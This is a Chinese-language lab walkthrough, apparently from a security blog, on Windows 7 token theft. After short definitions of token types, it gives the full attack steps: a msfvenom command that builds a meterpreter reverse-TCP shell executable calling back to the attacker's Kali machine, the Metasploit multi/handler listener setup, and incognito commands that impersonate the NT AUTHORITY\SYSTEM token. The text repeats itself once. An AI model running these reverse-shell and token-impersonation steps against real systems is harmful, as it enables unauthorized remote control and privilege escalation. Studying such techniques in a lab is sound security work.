Windows7令牌窃取

令牌(token)

访问令牌(Access Token):表示访问控制操作主体的系统对象
会话令牌(Session Token):是交互会话中唯一的身份标识符。
密保令牌(Security Token):又叫做认证令牌或硬件令牌,是一种计算机身份校验的物理设备,例如U盾

Delegation Token:也就是授权令牌,它支持交互式登录(例如可以通过远程桌面登录访问)
Impresonation Token:模拟令牌,它是非交互的会话。

复现准备

靶机:Windows7 192.168.1.15

攻击机:Kali 2021 192.168.1.16

生成反弹Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=7777 -f exe -o shell.exe

攻击

获取监听

msfconsle
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.1.16
lhost => 192.168.1.16
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > exploit 

打开靶机,双击生成的Shell,然后kali获取到反弹的shell

# 进入incognito
use incognito
# 列出令牌
list_tokens -u 
# 令牌假冒 SYSTEM
impersonate_token 'NT AUTHORITY\SYSTEM'

Windows7令牌窃取# Windows7令牌窃取

令牌(token)

访问令牌(Access Token):表示访问控制操作主体的系统对象
会话令牌(Session Token):是交互会话中唯一的身份标识符。
密保令牌(Security Token):又叫做认证令牌或硬件令牌,是一种计算机身份校验的物理设备,例如U盾

Delegation Token:也就是授权令牌,它支持交互式登录(例如可以通过远程桌面登录访问)
Impresonation Token:模拟令牌,它是非交互的会话。

复现准备

靶机:Windows7 192.168.1.15

攻击机:Kali 2021 192.168.1.16

生成反弹Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=7777 -f exe -o shell.exe

攻击

获取监听

msfconsle
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.1.16
lhost => 192.168.1.16
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > exploit 

打开靶机,双击生成的Shell,然后kali获取到反弹的shell

# 进入incognito
use incognito
# 列出令牌
list_tokens -u 
# 令牌假冒 SYSTEM
impersonate_token 'NT AUTHORITY\SYSTEM'

Windows7令牌窃取

上一篇:漏洞利用六:Linux系统漏洞利用


下一篇:Fastjson <= 1.2.47 反序列化漏洞复现